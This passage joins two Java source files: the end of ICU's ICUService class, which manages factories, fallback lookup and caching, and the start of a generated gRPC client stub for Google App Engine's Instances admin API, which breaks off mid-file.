defined that * parse complex IDs into components that Factories can more easily * use. The Key can cache the results of this parsing to save * repeated effort. ICUService provides convenience APIs that * take Strings and generate default Keys for use in querying.</p> * * <p>ICUService provides API to get the list of ids publicly * supported by the service (although queries aren't restricted to * this list). This list contains only 'simple' IDs, and not fully * unique ids. Factories are associated with each simple ID and * the responsible factory can also return a human-readable localized * version of the simple ID, for use in user interfaces. ICUService * can also provide a sorted collection of the all the localized visible * ids.</p> * * <p>ICUService implements ICUNotifier, so that clients can register * to receive notification when factories are added or removed from * the service. ICUService provides a default EventListener subinterface, * ServiceListener, which can be registered with the service. When * the service changes, the ServiceListener's serviceChanged method * is called, with the service as the only argument.</p> * * <p>The ICUService API is both rich and generic, and it is expected * that most implementations will statically 'wrap' ICUService to * present a more appropriate API-- for example, to declare the type * of the objects returned from get, to limit the factories that can * be registered with the service, or to define their own listener * interface with a custom callback method. They might also customize * ICUService by overriding it, for example, to customize the Key and * fallback strategy. ICULocaleService is a customized service that * uses Locale names as ids and uses Keys that implement the standard * resource bundle fallback strategy.<p> * @hide Only a subset of ICU is exposed in Android */ public class ICUService extends ICUNotifier { /** * Name used for debugging. */ protected final String name; /** * Constructor. */ public ICUService() { name = ""; } private static final boolean DEBUG = ICUDebug.enabled("service"); /** * Construct with a name (useful for debugging). */ public ICUService(String name) { this.name = name; } /** * Access to factories is protected by a read-write lock. This is * to allow multiple threads to read concurrently, but keep * changes to the factory list atomic with respect to all readers. */ private final ICURWLock factoryLock = new ICURWLock(); /** * All the factories registered with this service. */ private final List<Factory> factories = new ArrayList<Factory>(); /** * Record the default number of factories for this service. * Can be set by markDefault. */ private int defaultSize = 0; /** * Keys are used to communicate with factories to generate an * instance of the service. Keys define how ids are * canonicalized, provide both a current id and a current * descriptor to use in querying the cache and factories, and * determine the fallback strategy.</p> * * <p>Keys provide both a currentDescriptor and a currentID. * The descriptor contains an optional prefix, followed by '/' * and the currentID. Factories that handle complex keys, * for example number format factories that generate multiple * kinds of formatters for the same locale, use the descriptor * to provide a fully unique identifier for the service object, * while using the currentID (in this case, the locale string), * as the visible IDs that can be localized. * * <p> The default implementation of Key has no fallbacks and * has no custom descriptors.</p> */ public static class Key { private final String id; /** * Construct a key from an id. */ public Key(String id) { this.id = id; } /** * Return the original ID used to construct this key. */ public final String id() { return id; } /** * Return the canonical version of the original ID. This implementation * returns the original ID unchanged. */ public String canonicalID() { return id; } /** * Return the (canonical) current ID. This implementation * returns the canonical ID. */ public String currentID() { return canonicalID(); } /** * Return the current descriptor. This implementation returns * the current ID. The current descriptor is used to fully * identify an instance of the service in the cache. A * factory may handle all descriptors for an ID, or just a * particular descriptor. The factory can either parse the * descriptor or use custom API on the key in order to * instantiate the service. */ public String currentDescriptor() { return "/" + currentID(); } /** * If the key has a fallback, modify the key and return true, * otherwise return false. The current ID will change if there * is a fallback. No currentIDs should be repeated, and fallback * must eventually return false. This implmentation has no fallbacks * and always returns false. */ public boolean fallback() { return false; } /** * If a key created from id would eventually fallback to match the * canonical ID of this key, return true. */ public boolean isFallbackOf(String idToCheck) { return canonicalID().equals(idToCheck); } } /** * Factories generate the service objects maintained by the * service. A factory generates a service object from a key, * updates id->factory mappings, and returns the display name for * a supported id. */ public static interface Factory { /** * Create a service object from the key, if this factory * supports the key. Otherwise, return null. * * <p>If the factory supports the key, then it can call * the service's getKey(Key, String[], Factory) method * passing itself as the factory to get the object that * the service would have created prior to the factory's * registration with the service. This can change the * key, so any information required from the key should * be extracted before making such a callback. */ public Object create(Key key, ICUService service); /** * Update the result IDs (not descriptors) to reflect the IDs * this factory handles. This function and getDisplayName are * used to support ICUService.getDisplayNames. Basically, the * factory has to determine which IDs it will permit to be * available, and of those, which it will provide localized * display names for. In most cases this reflects the IDs that * the factory directly supports. */ public void updateVisibleIDs(Map<String, Factory> result); /** * Return the display name for this id in the provided locale. * This is an localized id, not a descriptor. If the id is * not visible or not defined by the factory, return null. * If locale is null, return id unchanged. */ public String getDisplayName(String id, ULocale locale); } /** * A default implementation of factory. This provides default * implementations for subclasses, and implements a singleton * factory that matches a single id and returns a single * (possibly deferred-initialized) instance. This implements * updateVisibleIDs to add a mapping from its ID to itself * if visible is true, or to remove any existing mapping * for its ID if visible is false. */ public static class SimpleFactory implements Factory { protected Object instance; protected String id; protected boolean visible; /** * Convenience constructor that calls SimpleFactory(Object, String, boolean) * with visible true. */ public SimpleFactory(Object instance, String id) { this(instance, id, true); } /** * Construct a simple factory that maps a single id to a single * service instance. If visible is true, the id will be visible. * Neither the instance nor the id can be null. */ public SimpleFactory(Object instance, String id, boolean visible) { if (instance == null || id == null) { throw new IllegalArgumentException("Instance or id is null"); } this.instance = instance; this.id = id; this.visible = visible; } /** * Return the service instance if the factory's id is equal to * the key's currentID. Service is ignored. */ @Override public Object create(Key key, ICUService service) { if (id.equals(key.currentID())) { return instance; } return null; } /** * If visible, adds a mapping from id -> this to the result, * otherwise removes id from result. */ @Override public void updateVisibleIDs(Map<String, Factory> result) { if (visible) { result.put(id, this); } else { result.remove(id); } } /** * If this.id equals id, returns id regardless of locale, * otherwise returns null. (This default implementation has * no localized id information.) */ @Override public String getDisplayName(String identifier, ULocale locale) { return (visible && id.equals(identifier)) ? identifier : null; } /** * For debugging. */ @Override public String toString() { StringBuilder buf = new StringBuilder(super.toString()); buf.append(", id: "); buf.append(id); buf.append(", visible: "); buf.append(visible); return buf.toString(); } } /** * Convenience override for get(String, String[]). This uses * createKey to create a key for the provided descriptor. */ public Object get(String descriptor) { return getKey(createKey(descriptor), null); } /** * Convenience override for get(Key, String[]). This uses * createKey to create a key from the provided descriptor. */ public Object get(String descriptor, String[] actualReturn) { if (descriptor == null) { throw new NullPointerException("descriptor must not be null"); } return getKey(createKey(descriptor), actualReturn); } /** * Convenience override for get(Key, String[]). */ public Object getKey(Key key) { return getKey(key, null); } /** * <p>Given a key, return a service object, and, if actualReturn * is not null, the descriptor with which it was found in the * first element of actualReturn. If no service object matches * this key, return null, and leave actualReturn unchanged.</p> * * <p>This queries the cache using the key's descriptor, and if no * object in the cache matches it, tries the key on each * registered factory, in order. If none generates a service * object for the key, repeats the process with each fallback of * the key, until either one returns a service object, or the key * has no fallback.</p> * * <p>If key is null, just returns null.</p> */ public Object getKey(Key key, String[] actualReturn) { return getKey(key, actualReturn, null); } // debugging // Map hardRef; public Object getKey(Key key, String[] actualReturn, Factory factory) { if (factories.size() == 0) { return handleDefault(key, actualReturn); } if (DEBUG) System.out.println("Service: " + name + " key: " + key.canonicalID()); CacheEntry result = null; if (key != null) { try { // The factory list can't be modified until we're done, // otherwise we might update the cache with an invalid result. // The cache has to stay in synch with the factory list. factoryLock.acquireRead(); Map<String, CacheEntry> cache = this.cache; // copy so we don't need to sync on this if (cache == null) { if (DEBUG) System.out.println("Service " + name + " cache was empty"); // synchronized since additions and queries on the cache must be atomic // they can be interleaved, though cache = new ConcurrentHashMap<String, CacheEntry>(); } String currentDescriptor = null; ArrayList<String> cacheDescriptorList = null; boolean putInCache = false; int NDebug = 0; int startIndex = 0; int limit = factories.size(); boolean cacheResult = true; if (factory != null) { for (int i = 0; i < limit; ++i) { if (factory == factories.get(i)) { startIndex = i + 1; break; } } if (startIndex == 0) { throw new IllegalStateException("Factory " + factory + "not registered with service: " + this); } cacheResult = false; } outer: do { currentDescriptor = key.currentDescriptor(); if (DEBUG) System.out.println(name + "[" + NDebug++ + "] looking for: " + currentDescriptor); result = cache.get(currentDescriptor); if (result != null) { if (DEBUG) System.out.println(name + " found with descriptor: " + currentDescriptor); break outer; } else { if (DEBUG) System.out.println("did not find: " + currentDescriptor + " in cache"); } // first test of cache failed, so we'll have to update // the cache if we eventually succeed-- that is, if we're // going to update the cache at all. putInCache = cacheResult; // int n = 0; int index = startIndex; while (index < limit) { Factory f = factories.get(index++); if (DEBUG) System.out.println("trying factory[" + (index-1) + "] " + f.toString()); Object service = f.create(key, this); if (service != null) { result = new CacheEntry(currentDescriptor, service); if (DEBUG) System.out.println(name + " factory supported: " + currentDescriptor + ", caching"); break outer; } else { if (DEBUG) System.out.println("factory did not support: " + currentDescriptor); } } // prepare to load the cache with all additional ids that // will resolve to result, assuming we'll succeed. We // don't want to keep querying on an id that's going to // fallback to the one that succeeded, we want to hit the // cache the first time next goaround. if (cacheDescriptorList == null) { cacheDescriptorList = new ArrayList<String>(5); } cacheDescriptorList.add(currentDescriptor); } while (key.fallback()); if (result != null) { if (putInCache) { if (DEBUG) System.out.println("caching '" + result.actualDescriptor + "'"); cache.put(result.actualDescriptor, result); if (cacheDescriptorList != null) { for (String desc : cacheDescriptorList) { if (DEBUG) System.out.println(name + " adding descriptor: '" + desc + "' for actual: '" + result.actualDescriptor + "'"); cache.put(desc, result); } } // Atomic update. We held the read lock all this time // so we know our cache is consistent with the factory list. // We might stomp over a cache that some other thread // rebuilt, but that's the breaks. They're both good. this.cache = cache; } if (actualReturn != null) { // strip null prefix if (result.actualDescriptor.indexOf("/") == 0) { actualReturn[0] = result.actualDescriptor.substring(1); } else { actualReturn[0] = result.actualDescriptor; } } if (DEBUG) System.out.println("found in service: " + name); return result.service; } } finally { factoryLock.releaseRead(); } } if (DEBUG) System.out.println("not found in service: " + name); return handleDefault(key, actualReturn); } private Map<String, CacheEntry> cache; // Record the actual id for this service in the cache, so we can return it // even if we succeed later with a different id. private static final class CacheEntry { final String actualDescriptor; final Object service; CacheEntry(String actualDescriptor, Object service) { this.actualDescriptor = actualDescriptor; this.service = service; } } /** * Default handler for this service if no factory in the list * handled the key. */ protected Object handleDefault(Key key, String[] actualIDReturn) { return null; } /** * Convenience override for getVisibleIDs(String) that passes null * as the fallback, thus returning all visible IDs. */ public Set<String> getVisibleIDs() { return getVisibleIDs(null); } /** * <p>Return a snapshot of the visible IDs for this service. This * set will not change as Factories are added or removed, but the * supported ids will, so there is no guarantee that all and only * the ids in the returned set are visible and supported by the * service in subsequent calls.</p> * * <p>matchID is passed to createKey to create a key. If the * key is not null, it is used to filter out ids that don't have * the key as a fallback. */ public Set<String> getVisibleIDs(String matchID) { Set<String> result = getVisibleIDMap().keySet(); Key fallbackKey = createKey(matchID); if (fallbackKey != null) { Set<String> temp = new HashSet<String>(result.size()); for (String id : result) { if (fallbackKey.isFallbackOf(id)) { temp.add(id); } } result = temp; } return result; } /** * Return a map from visible ids to factories. */ private Map<String, Factory> getVisibleIDMap() { synchronized (this) { // or idcache-only lock? if (idcache == null) { try { factoryLock.acquireRead(); Map<String, Factory> mutableMap = new HashMap<String, Factory>(); ListIterator<Factory> lIter = factories.listIterator(factories.size()); while (lIter.hasPrevious()) { Factory f = lIter.previous(); f.updateVisibleIDs(mutableMap); } this.idcache = Collections.unmodifiableMap(mutableMap); } finally { factoryLock.releaseRead(); } } } return idcache; } private Map<String, Factory> idcache; /** * Convenience override for getDisplayName(String, ULocale) that * uses the current default locale. */ public String getDisplayName(String id) { return getDisplayName(id, ULocale.getDefault(Category.DISPLAY)); } /** * Given a visible id, return the display name in the requested locale. * If there is no directly supported id corresponding to this id, return * null. */ public String getDisplayName(String id, ULocale locale) { Map<String, Factory> m = getVisibleIDMap(); Factory f = m.get(id); if (f != null) { return f.getDisplayName(id, locale); } Key key = createKey(id); while (key.fallback()) { f = m.get(key.currentID()); if (f != null) { return f.getDisplayName(id, locale); } } return null; } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses the current default Locale as the locale, null as * the comparator, and null for the matchID. */ public SortedMap<String, String> getDisplayNames() { ULocale locale = ULocale.getDefault(Category.DISPLAY); return getDisplayNames(locale, null, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the comparator, and null for the matchID. */ public SortedMap<String, String> getDisplayNames(ULocale locale) { return getDisplayNames(locale, null, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the matchID, thus returning all display names. */ public SortedMap<String, String> getDisplayNames(ULocale locale, Comparator<Object> com) { return getDisplayNames(locale, com, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the comparator. */ public SortedMap<String, String> getDisplayNames(ULocale locale, String matchID) { return getDisplayNames(locale, null, matchID); } /** * Return a snapshot of the mapping from display names to visible * IDs for this service. This set will not change as factories * are added or removed, but the supported ids will, so there is * no guarantee that all and only the ids in the returned map will * be visible and supported by the service in subsequent calls, * nor is there any guarantee that the current display names match * those in the set. The display names are sorted based on the * comparator provided. */ public SortedMap<String, String> getDisplayNames(ULocale locale, Comparator<Object> com, String matchID) { SortedMap<String, String> dncache = null; LocaleRef ref = dnref; if (ref != null) { dncache = ref.get(locale, com); } while (dncache == null) { synchronized (this) { if (ref == dnref || dnref == null) { dncache = new TreeMap<String, String>(com); // sorted Map<String, Factory> m = getVisibleIDMap(); Iterator<Entry<String, Factory>> ei = m.entrySet().iterator(); while (ei.hasNext()) { Entry<String, Factory> e = ei.next(); String id = e.getKey(); Factory f = e.getValue(); dncache.put(f.getDisplayName(id, locale), id); } dncache = Collections.unmodifiableSortedMap(dncache); dnref = new LocaleRef(dncache, locale, com); } else { ref = dnref; dncache = ref.get(locale, com); } } } Key matchKey = createKey(matchID); if (matchKey == null) { return dncache; } SortedMap<String, String> result = new TreeMap<String, String>(dncache); Iterator<Entry<String, String>> iter = result.entrySet().iterator(); while (iter.hasNext()) { Entry<String, String> e = iter.next(); if (!matchKey.isFallbackOf(e.getValue())) { iter.remove(); } } return result; } // we define a class so we get atomic simultaneous access to the // locale, comparator, and corresponding map. private static class LocaleRef { private final ULocale locale; private SortedMap<String, String> dnCache; private Comparator<Object> com; LocaleRef(SortedMap<String, String> dnCache, ULocale locale, Comparator<Object> com) { this.locale = locale; this.com = com; this.dnCache = dnCache; } SortedMap<String, String> get(ULocale loc, Comparator<Object> comp) { SortedMap<String, String> m = dnCache; if (m != null && this.locale.equals(loc) && (this.com == comp || (this.com != null && this.com.equals(comp)))) { return m; } return null; } } private LocaleRef dnref; /** * Return a snapshot of the currently registered factories. There * is no guarantee that the list will still match the current * factory list of the service subsequent to this call. */ public final List<Factory> factories() { try { factoryLock.acquireRead(); return new ArrayList<Factory>(factories); } finally{ factoryLock.releaseRead(); } } /** * A convenience override of registerObject(Object, String, boolean) * that defaults visible to true. */ public Factory registerObject(Object obj, String id) { return registerObject(obj, id, true); } /** * Register an object with the provided id. The id will be * canonicalized. The canonicalized ID will be returned by * getVisibleIDs if visible is true. */ public Factory registerObject(Object obj, String id, boolean visible) { String canonicalID = createKey(id).canonicalID(); return registerFactory(new SimpleFactory(obj, canonicalID, visible)); } /** * Register a Factory. Returns the factory if the service accepts * the factory, otherwise returns null. The default implementation * accepts all factories. */ public final Factory registerFactory(Factory factory) { if (factory == null) { throw new NullPointerException(); } try { factoryLock.acquireWrite(); factories.add(0, factory); clearCaches(); } finally { factoryLock.releaseWrite(); } notifyChanged(); return factory; } /** * Unregister a factory. The first matching registered factory will * be removed from the list. Returns true if a matching factory was * removed. */ public final boolean unregisterFactory(Factory factory) { if (factory == null) { throw new NullPointerException(); } boolean result = false; try { factoryLock.acquireWrite(); if (factories.remove(factory)) { result = true; clearCaches(); } } finally { factoryLock.releaseWrite(); } if (result) { notifyChanged(); } return result; } /** * Reset the service to the default factories. The factory * lock is acquired and then reInitializeFactories is called. */ public final void reset() { try { factoryLock.acquireWrite(); reInitializeFactories(); clearCaches(); } finally { factoryLock.releaseWrite(); } notifyChanged(); } /** * Reinitialize the factory list to its default state. By default * this clears the list. Subclasses can override to provide other * default initialization of the factory list. Subclasses must * not call this method directly, as it must only be called while * holding write access to the factory list. */ protected void reInitializeFactories() { factories.clear(); } /** * Return true if the service is in its default state. The default * implementation returns true if there are no factories registered. */ public boolean isDefault() { return factories.size() == defaultSize; } /** * Set the default size to the current number of registered factories. * Used by subclasses to customize the behavior of isDefault. */ protected void markDefault() { defaultSize = factories.size(); } /** * Create a key from an id. This creates a Key instance. * Subclasses can override to define more useful keys appropriate * to the factories they accept. If id is null, returns null. */ public Key createKey(String id) { return id == null ? null : new Key(id); } /** * Clear caches maintained by this service. Subclasses can * override if they implement additional that need to be cleared * when the service changes. Subclasses should generally not call * this method directly, as it must only be called while * synchronized on this. */ protected void clearCaches() { // we don't synchronize on these because methods that use them // copy before use, and check for changes if they modify the // caches. cache = null; idcache = null; dnref = null; } /** * Clears only the service cache. * This can be called by subclasses when a change affects the service * cache but not the id caches, e.g., when the default locale changes * the resolution of ids changes, but not the visible ids themselves. */ protected void clearServiceCache() { cache = null; } /** * ServiceListener is the listener that ICUService provides by default. * ICUService will notifiy this listener when factories are added to * or removed from the service. Subclasses can provide * different listener interfaces that extend EventListener, and modify * acceptsListener and notifyListener as appropriate. */ public static interface ServiceListener extends EventListener { public void serviceChanged(ICUService service); } /** * Return true if the listener is accepted; by default this * requires a ServiceListener. Subclasses can override to accept * different listeners. */ @Override protected boolean acceptsListener(EventListener l) { return l instanceof ServiceListener; } /** * Notify the listener, which by default is a ServiceListener. * Subclasses can override to use a different listener. */ @Override protected void notifyListener(EventListener l) { ((ServiceListener)l).serviceChanged(this); } /** * When the statistics for this service is already enabled, * return the log and resets he statistics. * When the statistics is not enabled, this method enable * the statistics. Used for debugging purposes. */ public String stats() { ICURWLock.Stats stats = factoryLock.resetStats(); if (stats != null) { return stats.toString(); } return "no stats"; } /** * Return the name of this service. This will be the empty string if none was assigned. */ public String getName() { return name; } /** * Returns the result of super.toString, appending the name in curly braces. */ @Override public String toString() { return super.toString() + "{" + name + "}"; } }
googleapis/google-cloud-java
35,997
java-appengine-admin/grpc-google-cloud-appengine-admin-v1/src/main/java/com/google/appengine/v1/InstancesGrpc.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.appengine.v1; import static io.grpc.MethodDescriptor.generateFullMethodName; /** * * * <pre> * Manages instances of a version. * </pre> */ @javax.annotation.Generated( value = "by gRPC proto compiler", comments = "Source: google/appengine/v1/appengine.proto") @io.grpc.stub.annotations.GrpcGenerated public final class InstancesGrpc { private InstancesGrpc() {} public static final java.lang.String SERVICE_NAME = "google.appengine.v1.Instances"; // Static method descriptors that strictly reflect the proto. private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "ListInstances", requestType = com.google.appengine.v1.ListInstancesRequest.class, responseType = com.google.appengine.v1.ListInstancesResponse.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod; if ((getListInstancesMethod = InstancesGrpc.getListInstancesMethod) == null) { synchronized (InstancesGrpc.class) { if ((getListInstancesMethod = InstancesGrpc.getListInstancesMethod) == null) { InstancesGrpc.getListInstancesMethod = getListInstancesMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "ListInstances")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.ListInstancesRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.ListInstancesResponse.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("ListInstances")) .build(); } } } return getListInstancesMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "GetInstance", requestType = com.google.appengine.v1.GetInstanceRequest.class, responseType = com.google.appengine.v1.Instance.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod; if ((getGetInstanceMethod = InstancesGrpc.getGetInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getGetInstanceMethod = InstancesGrpc.getGetInstanceMethod) == null) { InstancesGrpc.getGetInstanceMethod = getGetInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "GetInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.GetInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.Instance.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("GetInstance")) .build(); } } } return getGetInstanceMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "DeleteInstance", requestType = com.google.appengine.v1.DeleteInstanceRequest.class, responseType = com.google.longrunning.Operation.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod; if ((getDeleteInstanceMethod = InstancesGrpc.getDeleteInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getDeleteInstanceMethod = InstancesGrpc.getDeleteInstanceMethod) == null) { InstancesGrpc.getDeleteInstanceMethod = getDeleteInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "DeleteInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.DeleteInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.longrunning.Operation.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("DeleteInstance")) .build(); } } } return getDeleteInstanceMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "DebugInstance", requestType = com.google.appengine.v1.DebugInstanceRequest.class, responseType = com.google.longrunning.Operation.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod; if ((getDebugInstanceMethod = InstancesGrpc.getDebugInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getDebugInstanceMethod = InstancesGrpc.getDebugInstanceMethod) == null) { InstancesGrpc.getDebugInstanceMethod = getDebugInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "DebugInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.DebugInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.longrunning.Operation.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("DebugInstance")) .build(); } } } return getDebugInstanceMethod; } /** Creates a new async stub that supports all call types for the service */ public static InstancesStub newStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesStub>() { @java.lang.Override public InstancesStub newStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesStub(channel, callOptions); } }; return InstancesStub.newStub(factory, channel); } /** Creates a new blocking-style stub that supports all types of calls on the service */ public static InstancesBlockingV2Stub newBlockingV2Stub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingV2Stub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingV2Stub>() { @java.lang.Override public InstancesBlockingV2Stub newStub( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingV2Stub(channel, callOptions); } }; return InstancesBlockingV2Stub.newStub(factory, channel); } /** * Creates a new blocking-style stub that supports unary and streaming output calls on the service */ public static InstancesBlockingStub newBlockingStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingStub>() { @java.lang.Override public InstancesBlockingStub newStub( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingStub(channel, callOptions); } }; return InstancesBlockingStub.newStub(factory, channel); } /** Creates a new ListenableFuture-style stub that supports unary calls on the service */ public static InstancesFutureStub newFutureStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesFutureStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesFutureStub>() { @java.lang.Override public InstancesFutureStub newStub( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesFutureStub(channel, callOptions); } }; return InstancesFutureStub.newStub(factory, channel); } /** * * * <pre> * Manages instances of a version. * </pre> */ public interface AsyncService { /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ default void listInstances( com.google.appengine.v1.ListInstancesRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getListInstancesMethod(), responseObserver); } /** * * * <pre> * Gets instance information. * </pre> */ default void getInstance( com.google.appengine.v1.GetInstanceRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getGetInstanceMethod(), responseObserver); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ default void deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getDeleteInstanceMethod(), responseObserver); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ default void debugInstance( com.google.appengine.v1.DebugInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getDebugInstanceMethod(), responseObserver); } } /** * Base class for the server implementation of the service Instances. * * <pre> * Manages instances of a version. * </pre> */ public abstract static class InstancesImplBase implements io.grpc.BindableService, AsyncService { @java.lang.Override public final io.grpc.ServerServiceDefinition bindService() { return InstancesGrpc.bindService(this); } } /** * A stub to allow clients to do asynchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesStub extends io.grpc.stub.AbstractAsyncStub<InstancesStub> { private InstancesStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesStub build(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public void listInstances( com.google.appengine.v1.ListInstancesRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getListInstancesMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Gets instance information. * </pre> */ public void getInstance( com.google.appengine.v1.GetInstanceRequest request, 